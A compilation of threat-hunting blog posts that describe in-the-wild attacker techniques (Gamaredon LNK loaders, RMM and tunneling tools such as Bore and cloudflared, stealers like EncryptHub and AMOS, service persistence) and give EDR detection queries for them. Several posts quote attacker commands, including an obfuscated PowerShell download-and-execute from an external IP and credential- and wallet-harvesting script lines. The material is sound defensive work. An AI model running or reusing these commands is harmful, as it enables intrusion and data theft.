Know Your Adversary

Hello everyone! We haven't talked about PowerShell abuse for some time, but I think we can continue. And Gamaredon will help us! The group continues to distribute malicious LNK files, which contain PowerShell code to download and execute the payload, and open the decoy document, for example : powershell.exe -WindowStyle hidden echo DsuXBGtDPVpafNQKWfGNQXRPehfejEMnZWqvtPFEKrDQRtLDoRtJCcMjEFenVKrryMHia; Write-HostZVRjgZrFwKSbjNrBtIujdNLLlPq; if (-not(Test-Path iscabv.''zi''p -PathType Leaf)){echo vgUYzpRfaoGxgCSuzlmZCRxmXRnGJKBwooBEEoJgvYqjRXoXTHaspGDtNMuMovanuZezIbSYgAmXMqDOLMczhxmvJtkBJPsVai; &(g''cm i******w*****r) -uri h''t''tp:''//''146''.''1''85''.''233''.''90''/iscabv.''zi''p -OutFile iscabv.''zi''p}; Expand-Archive -Path iscabv.''zi''p -DestinationPath Drvx64; star''t  Drvx64/IsCabView.''e...

Hello everyone! I think it's not a secret that ransomware gangs often abuse various RMMs. Some are quite well-know, while others are not seen that often. Recently I spotted another RMM I don't often see in ransomware incidents - it's called NinjaRMM . For example, this tool was used by Medusa ransomware affiliates. As always, we can start from detecting related network communications: event_type: "dnsreq" AND dns_rname: "ninjarmm.com" Next thing - common file names related to RMM components, for example: event_type: "processcreatewin" AND proc_file_name: ("NinjaRMMAgent.exe" OR "NinjaRMMAgenPatcher.exe" OR "ninjarmm-cli.exe") Finally, let's search for renamed binaries based on product name: event_type: "processcreatewin" AND proc_file_productname: "NinjaRMM" See you tomorrow!

Hello everyone! Adversaries always need to execute commands via various command and scripting interpreters. It's a well-known behavior, so they always look for defense evasion techniques. Trend Micro releleased a report on  Water Gamayun , and noted an interesting technique used by the threat acrors for proxy execution. The adversary abused a renamed version of IntelliJ's Command Line Runner (runnerw.exe) to execute PowerShell. Of course, we can hunt for similar behaviors searching for renamed binaries: event_type: "processcreatewin" AND proc_file_originalfilename: "runnerw.exe" AND NOT proc_file_name: ("runnerw.exe" OR "runnerw64.exe") As always, more detection opportunities are in the report! See you tomorrow!

Hello everyone! Another day - another tool. This time it's not a regular tool, but PowerTool ! This is another popular tool abused by ransomware gangs to disable security controls. For example, it's used by Akira ransomware affiliates. Let's start from process creation events: event_type: "processcreatewin" AND (proc_file_productname: "PowerTool" OR proc_file_originalfilename: "PowerTool.exe") One more thing -  PowerTool's driver loading: event_type: "processmoduleload" AND file_productname: "PowerTool" Want more? Here's the sample ! See you tomorrow!

Hello everyone! Let's keep looking inside a ransomware affiliate's toolkit. This time it's  IObit Unlocker . The adversary leverages this tool to unlock files and folders that are locked by other processes. For example, the tool is a part of RansomHub arsenal. As always, we can look at metadata or, if the adversary installed it, look for corresponding folders: event_type: "prorcesscreatewin" AND (proc_file_productname: "IObit Unlocker" OR proc_file_path: "IObit") You can look at the sample yourself and find more detection opportunities, of course! See you tomorrow!

Hello everyone! Let's talk about SVG files. Recently many adversaries leveraged it in their phishing campaigns. What's more, in many cases the threat actors leveraged files with double extension, for example, New Purchase Order__pdf.svg . This files contain obfuscated JavaScript code, which collects credentials and transmits it to the attacker-controlled server. Double extension makes it really easy to detect: event_type: "filecreatewin" AND file_name: ("pdf" AND "svg") Of course, adversaries may use just .svg extension, so you can hunt for SVG files creation events in locations common for file downloading, such as Downloads , Desktop , Documents , etc. See you tomorrow!

Hello everyone! I've compiled a list of tools abused by ransomware affiliates for defense evasion, and plan to cover every tool in the blog. Today we'll talk about PCHunter . This is another tool leveraged by adversaries for identification of processes related to security products, and terminating them. As always, let's start from binary detection: event_type: "processcreatewin"   AND   proc_file_originalfilename: "PCHunter.exe" Also, you can search for related DNS requests: event_type: "dnsreq" AND dns_rname: "epoolsoft.com" Finally, it's a good idea to search for PCHunter's driver file creation events: event_type: "filecreatewin"   AND   file_path: ("PCHunter" AND "sys") As always, here's a sample . See you tomorrow!

Hello everyone! Let's talk about another tool in ransomware affiliate's arsenal. This time it's going to be  HRSword ! Usually adversaries use it to disable the target machine’s defenses. For example, according to this report , the tool was used by Helldown ransomware affiliates to monitor and terminate security-related processes. Let's start from the binary itself, and create a detector based on its metadata: event_type: "processcreatewin"  AND  proc_file_originalfilename: "HRSword.exe" It also abuses cmd.exe to copy multiple files to " C:\Windows\System32\drivers\ ", for example: cmd.exe /S /D /c" copy Drivers\x32\sysdiag.sys "C:\Windows\System32\drivers\" Here we can use the following logic: event_type: "processcreatewin"  AND proc_file_name: "cmd.exe" AND cmdline: ("copy" AND "drivers") Want more detection opportunities? Check the sample ! See you tomorrow!

Hello everyone! Malicious browser extensions are stopping to be an exotic threat. For example,  Rilide . It was first reported in April 2023, but became a common threat, and this report is another proof of it. Can we hunt for such extensions? Of course, yes! For example, usually threats like Rilide modify browser-reated LNK files to run it with " --load-extension " argument, like this: chrome.exe --load-extension="C:\Users\user\AppData\Local\Temp\MalExt" It means we can hunt for execution of common Chromium-based browsers with this argument: event_type: "processcreatewin" AND proc_file_name: ("chrome.exe" OR "brave.exe" OR "opera.exe" OR "msedge.exe")  AND cmdline: "load-extension" I'm sure you'll get false positives, but this is what we expect from threat hunting, right? Proper filtering will help you, I'm sure! See you tomorrow!

Hello everyone! Let's talk about another popular among adversaries tunneling tool - EarthWorm . The threat actors may use it for network tunneling with a SOCKS5 server and port transfer functionalities. I think you want some example observed ITW, right? Here's one from a recent Cisco Talos report on UAT-5918 : Run32.exe -s ssocksd -l 8888 If we look at EarthWorm's website , we can find more interesting command line arguments we can use to build detection logic, for example, " rssocks " and " rcsocks ". So, let's search for process creation events with " ssocksd ", " rcsocks " or " rssocks " in the command line: event_type: "processcreate" AND cmdline: ("ssocksd" OR "rcsocks" OR "rssocks") Of course, you can experiment with other available arguments as well! See you tomorrow!

Hello everyone! Today many adversaries leverage malcious LNK files in their operations. And Silent Werewolf (also known as XDSpy ) is not an exception. The threat actors use phishing emails to deliver an archive with an LNK file and an INI file. But it's more than an INI file, it's an archive with a legitimate executable, a malicious DLL and a decoy document. Let's focus on the LNK file and the script it executes. Despite the fact there are lots of interesting strings you can use for detection, I've chosen just " Convert.ToChar " as it's quite common for malicious scripts: event_type: "processcreatewin" AND proc_file_name: "cmd.exe" AND  cmdline: "Convert.ToChar" You can learn more about its behaviors, here is a sample . See you tomorrow!

Hello everyone! How are your threat hunting missions going? Let's talk about DarkWatchman - a RAT leveraged by an activity cluster we track as Watch Wolf . So, let's use it to generate a threat hunting hypothesis. Let's focus on the following behavior: wscript.exe "C:\Users\user\AppData\Local\c784477d0.js" 188 As you can see, it abuses wscript.exe to execute a malicious JS-script located in the specific folder. So, we can hunt for suspicious JS-scripts executed from the same folder or subfolders: event_type: "processcreatewin" AND proc_file_name: "wscript.exe" AND cmdline: "AppData\\Local" AND "js" If you want to learn more about this RAT's behaviours - here's a sample for you. See you tomorrow!

Hello everyone! We haven't talked about macOS stealers for some time. Definitely, this threat as a trend, so let's talk about AMOS . Recently I spotted an interesting anti-analysis procedure leveraged by this stealer: osascript -e "set memData to do shell script \"system_profiler SPMemoryDataType\" if memData contains \"QEMU\" or memData contains \"VMware\" then     do shell script \"exit 42\" else     do shell script \"exit 0\" end if" The malware checks for the presence of virtual machines and exits with error code 42 if it detects any. We can detect such behavior this way: event_type: "processcreatemac" AND proc_file_name: "osascript" AND cmdline: "SPMemoryDataType" AND ("QEMU" OR "VMware") If you want to learn more about AMOS behaviors, here's a sample for you. See you tomorrow!

Hello everyone! We often use sandboxes for malware triage, but what about adversaries? Can they abuse sandboxes to execute malicious code? And the answer is - yes! ESET presented a report on MirrorFace attack against a Central European diplomatic institute. Among other malware, the threat actors used a heavily customised variant of  AsyncRAT . And they run it... inside Windows Sandbox! The adversary created a scheduled task to run Windows Sandbox with a WSB file as argument. So, we can hunt for such activity using the following query: event_type: "processcreatewin" AND proc_file_name: ("WindowsSandbox.exe" OR "wsb.exe") AND cmdline: "wsb" Make sure you checked the report - it's full of interesting detection opportunities! See you tomorrow!

Hello everyone! F6 released a public report on an activity cluster we track under the name Herald Werewolf (they named it Telemancon ). The activity is quite interesting, so I decide to share the report and lok at detection opportunities. The first interesting thing - the adversary drops an obfuscated PowerShell script to  %userprofile%\Contacts folder and abuses the Run key for persistence. We can search for registry modification events related to the Run key with files in Contacts folder: event_type: "registryvalueset" AND reg_key_path: "CurrentVersion\\Run" AND reg_value_data: "Contacts" Another suspicious thing we can search for - PowerShell connects to  telegra[.]ph : event_type: "dnsreq" AND  dns_rname: "telegra.ph"  AND  proc_file_path: "powershell.exe" Also note interesting registry modification behaviors - they are also great candidates for hunting! See you tomorrow!

Hello everyone! I want to continue sharing information on RMMs abused by various ransomware affiliates and other threat actors. And look at detection opportunities, of course! Today we'll look at another popular RAT - ConnectWise . If you want a fresh example of ConnectWise abuse - here you go. So, let's look at this report from detection perspective. First of all, the malicious file runs msiexec.exe to install ConnectWise: msiexec.exe" /i "C:\Users\<USER>\AppData\Local\Temp\ScreenConnect\24.3.7.9067\797046ee258ccec1\ScreenConnect.ClientSetup.msi" Let's search for msiexec.exe executions with "ScreenConnect" in the target path: event_type: "processcreatewin" AND proc_file_name: "msiexec.exe" AND cmdline: "ScreenConnect" So, the adversary uses a legitimate ConnectWise client, so we can also hunt for it as well (or detect if you don't use it in your environment): event_type: "processcreatewin" AND proc...

Hello everyone! Let's keep talking about modern ransomware affiliate's toolkit. Today we'll look at defense evasion and command and control capabilities. I came across this CISA advisory on Medusa Ransomware, and spotted the following tool - Cloudflared. It's used to securely expose applications, services, or servers to the internet via Cloudflare Tunnel without exposing them directly. Of course, adversaries abuse this feature! To create a tunnel, the threat actor should run the following command (or just run the installer, it creates a service and runs the command): cloudflared.exe tunnel run --token [redacted] Not very common command line arguments, right? Let's use it to build detection: event_type: "processcreate"  AND  cmdline: ("tunnel" AND "run" AND "token") Have you observed any other interesting tunneling tools ITW recently? See you tomorrow!

Hello everyone! Yes, ransomware. Again. Let's look at another RMM abused by adversaries -  FleetDeck . I don't see it very often, but there're even public reports showing it's leveraged by by ransomware affiliates, for example,  ALPHV . By the way, this legitimate remote access tool has a very interesting slogan on its website - "Command and Control". Let's start from DNS requests to fleetdeck[.]io: event_type: "dnsreq" AND dns_rname: "fleetdeck.io" The tool isn't very common, we can hunt for processes executed from default installation location: event_type: "processcreatewin" AND proc_file_path: "FleetDeck Agent" The installer also uses PowerShell (yes, again) to create a new firewall rule: powershell.exe -Command "New-NetFirewallRule -DisplayName 'FleetDeck Agent Service' -Name 'FleetDeck Agent Service' -Direction Inbound -Program 'C:\Program Files (x86)\FleetDeck Agent\fleetdeck_agent...

Hello everyone! Let's keep looking at PowerShell abuse examples observed in-the-wild. I hope you have ScriptBlock events (Event ID 4104) from Powershell-Operational Event Logs, as we're going to look inside malicious scripts this time. Recently Outpost24 blogged about  EncryptHub , and I spotted a very interesting PowerShell script responsible for stealing sensitive data. Let's look at the script from detection perspective. For example, the adversary attempts to collect Telegram data: $processname = "telegram" $pathtele = "$env:userprofile\AppData\Roaming\Telegram Desktop\tdata" It means we can hunt for Telegram data paths in the ScriptBlock: event_type: "ScriptExecutionWin" AND script_text: "Telegram Desktop" AND "tdata" Another example is collecting crypto wallets data: "Armory" = Join-Path $env:appdata "\Armory\*.wallet" "Atomic" = Join-Path $env:appdata "\Atomic\Local Storage\leveldb...

Hello everyone! I hope you checked this report on APT37 (we track this activity cluster as Squid Werewolf) already. As always, let's look at detection opporrunities! The adversary leveraged a malicious LNK file to execute PowerShell with " -nop " argument, of course, we can use it for detection\hunting: proc_p_file_path: "explorer.exe"  AND  proc_file_name: "powershell.exe"  AND  cmdline: "nop"  Also, the threat actors abuse dfsvc.exe , and use renamed executable to run the malicious code. For example, we can search for renamed files: event_type: "processcreatewin"  AND  proc_file_originalfilename: "dfsvc.exe"  AND NOT  proc_file_name: "dfsvc.exe" One more opportunity - abusing  timeapi[.]io to check Internet connection: event_type: "dnsreq"  AND  dns_rname: "timeapi.io" Which detection and hunting opportunities have you spotted? See you tomorrow!

Hello everyone! How do you choose telemetry sources? For example, IoT devices. Do you collect data from this source? Why am I asking? In a recent incident Akira affiliates (we track this cluster as Neon Wolf) used a webcam to deploy ransomware! The adversary decided to pivot to this device, because there're no EDR on it, and it had a few critical vulnerabilities. Was it possible to detect malicious activity earlier? Yes! According to IoCs list, the threat actors also used AnyDesk to enable redundant access. As you already know, it's an extremely common technique, here's an example of how to search for related activity: event_type: "processcreate" AND  proc_file_productname: "anydesk"  AND NOT  proc_file_path: ("program files" OR "appdata") I excluded standard installation paths, but you can include it, it depends on the amount of noise. Happy hunting! See you tomorrow!

Hello everyone! Let's talk about another interesting file type leveraged by adversaries for gaining initial access. I'm talking about .url files. For example, look at Blind Eagle . The adversary uses such files in a series of ongoing campaigns targeting Colombian institutions and government entities. If we look at file names, we can notice that many of them have double or even triple extension ( DOCUMENTO_PDF_CON_INFORMACIÓN_PRUEBA_COVID_19.pdf.zip (1).url ). Detecting such files is quite easy, for example: event_type: "filecreate" AND file_name: ("pdf" AND "url") At the same time, some file have single extension ( Documento Judicial Nº 00223 - Sentencia 003948 Vigente 28 de enero.url ). Thankfully, such files are not very common and you still can search for creation events during your hunting missions! See you tomorrow!

Hello everyone! Let's keep talking about ransomware affiliate's toolkit. This time about remote monitoring and management (RMM) software. If you checked the report I shared yesterday, you may noticed the adversary used a number of RMMs. We are going to talk about one of them - MeshAgent. Another example of MeshAgent abuse is Enigma Wolf, you can read about this ransomware gang in this report. As always, we can search for processes with MeshAgent-related metadata: event_type: "processcreatewin" AND (proc_file_originalfilename: "MeshAgent.exe" OR proc_file_productname: "MeshCentral Agent ") Depending on configuration, you may also observe meshcentral[.]com DNS requests: event_type: "dnsreq" AND dns_rname: "meshcentral.com" If your EDR solution collects PDB data, you can use for detection as well: event_type: "processcreatewin" AND proc_file_pdb_path: "MeshAgent" I'm sure you can find event more detection ...

Hello everyone! I think everybody who is reading this blog already knows that usually the attack lifecycle has a number of stages. Of course, you should detect most attacks on early stages, but it's not always possible. Today we'll talk about ransomware deployment tools. In most cases it's the last frontier. If you failed to detect the adversary at this stage - most likely you had to deal with encrypted system in your enterprise. Let's look into a report on  MedusaLocker : "The attacker used PDQ Inventory to get an inventory of the endpoints on the network. PDQ Deploy then used this information to deploy the AVKiller binary and driver under the Windows directory to all the endpoints and execute it. The attacker then used PDQ Deploy to transfer the ransomware binary and execute it." As you can see, the adversary first used PDQ Inventory for discovery, then PDQ Deploy to evade defenses and deploy ransomware. Let's use metadata to search for such activity: ev...

Hello everyone! Tunneling tools - they are everywhere! Today we'll look at another example observed in-the-wild - Bore.  It's a CLI tool that exposes local ports to a remote server. Want an example? Sure, here you go: "%TEMP%\svhos.exe" local 3389 --to 91.202.233[.]238 Third-rate masquarading, right? I think you noticed interesting command line parameters we can use for building detections. Here's an example: event_type: "processcreate"  AND  cmdline.keyword: /.* local .*/  AND  cmdline: (("3389" OR "22") AND "to") Of course, you can experiment with port numbers and exclusions! See you tomorrow!

Hello everyone! Today we'll look at Phantom Goblin - a malware operation that leverages social engineering tactics to distribute stealers, which was uncovered by Cyble  researhers. Despite the fact many techniques are quite noisy, a few caught my attention. The first one is bypassing App Bound Encryption (ABE) to extract cookie data via running browser in headless mode and enabling remote debugging. We can use the following query to search for such activity (you can expand browsers list, of course): event_type: "processcreate"  AND  proc_file_name: ("brave.exe" OR "chrome.exe" OR "msedge.exe")  AND  cmdline: ("headless" AND "remote-debugging-port" AND "remote-allow-origins") Another interesting technique is abusing Visual Studio Code to create a remote tunnel. We can search for such activity using the following query: event_type: "processcreate"  AND  proc_file_name: "code.exe"  AND  cmdline: ...

Hello everyone! Today I decide to share a few books on cyber threat intelligence I often recommend. It won't be a long list, just four book to start. Robert M. Lee, Jeff Haas, Threat Intelligence and Me: A Book for Children and Analysts Have you ever tried to explain the basic concepts of cyber threat intelligence to a child? No? Well, Robert M. Lee and illustrator Jeff Haas did, and they succeeded quite well. By the way, the book is also suitable for adults, as its title suggests. Thomas Roccia, Visual Threat Intelligence: An Illustrated Guide For Threat Researchers This book also contains a wealth of illustrations and is suitable for those who want to understand all the concepts of cyber threat intelligence in the shortest possible time. There is, of course, a textual description as well, but it covers only a couple of pages for each topic. And it will save you a lot of time. It's perfect for those who dislike "fluff." Kyle Wilhoit, Joseph Opacki, Operationalizing T...

Hello everyone! I think you already noticed that Kimsuky (we track it as Monotithic Werewolf) is a frequent guest in my blog. The thing is - the cluster is quite creative and provides lots of detection ideas! Today we'll loot at how the adversary abused Control Panel Items in the campaign described in this report . So, the threat actors used a malicious file with double extension -  [한글] 계엄사-합수본부 운영 참고자료[원본].hwp.cpl . It is a Control Panel item, and is executed with control.exe . It means we can search for abusing of control.exe (you can experiment with double extensions, of course): event_type: "processcreate" AND proc_file_name: "control.exe" AND cmdline: ("hwp" AND "cpl") OR ("docx" AND "cpl") OR ("pdf" AND "cpl") After execution, the file connects to github[.]com to download additional files - and we have another detection opportunity: event_type: "dnsreq" AND  ...

Hello everyone! Today we'll look at another tool from a ransomware gang's toolkit. It's called MiniDump , and it enables adversaries to dump LSASS or any other process. Let's look at a few detection opportunities. The tool drops and loads a driver with the following name  - kxxxxxxx.sys . It means we can search for creation events related to it: event_type: "filecreate"  AND  file_name: "kxxxxxxx.sys" MiniDump also creates a service with the same name - another detection opportunity: event_type: "serviceuninstallwin" AND service_name: "kxxxxxxx.sys" Finally, the tool loads the driver: event_type: "driverloadwin"  AND file_name: "kxxxxxxx.sys" AND file_sig: "DFOCUS Co., Ltd" Interesting enough that the driver name is the same as in the EDR killer advertised some time ago by threat actor with moniker "r1z". See you tomorrow!

Hello everyone! I think, you already got used to malicious Microsoft Word documents and Microsoft Excel spreadsheets, right? But what about Microsoft PowerPoint? Of course, we all use it to create presentations for threat briefings, but what about adversaries? Yes, they also use it! Let's look at DONOT Team (APT-Q-38) campaign described in this report. One of kill chains included a malicious PowerPoint presentation (PPT), delivered via a link in a phishing PDF document. Malicious macro in the PPT file executes the shellcode in order to download next stages. The first detection opportunity - powerpnt.exe spawns cmd.exe to execute a BAT file: cmd.exe /c C:\Users\user\AppData\Local\TEMP\FROX\cross.bat You can catch such activity this way: event_type: "processcreate" AND proc_p_file_path: "powerpnt.exe" AND proc_file_path: "cmd.exe" What does the BAT file do? Creates a scheduled task via schtasks.exe: schtasks /create /tn "PerformTaskMaintain" /...

Hello everyone! Abusing Windows services is a very common persistence technique. Usually adversaries just create a new service, but in some cases they may also modify existing services! Let's look at such example. Cisco Talos presented a report on an espionage activity cluster they track as Lotus Blossom. The threat actors leverage reg.exe to modify registry keys related to services and enable persistence of Sagerunex backdoor: reg add HKLM\SYSTEM\CurrentControlSet\Services\tapisrv\Parameters /v ServiceDll /t REG_EXPAND_SZ /d c:\windows\tapisrv.dll /f  reg add HKLM\SYSTEM\CurrentControlSet\Services\tapisrv /v Start /t REG_DWORD /d 2 /f  An easy way to hunt for such activity is to search for " ServiceDll " among reg.exe command line parameters: event_type:"processcreate" AND proc_file_name: "reg.exe" AND cmdline: "ServiceDll" Depending on your telemetry, you can also search for " ServiceDll " value modification events as well! Hav...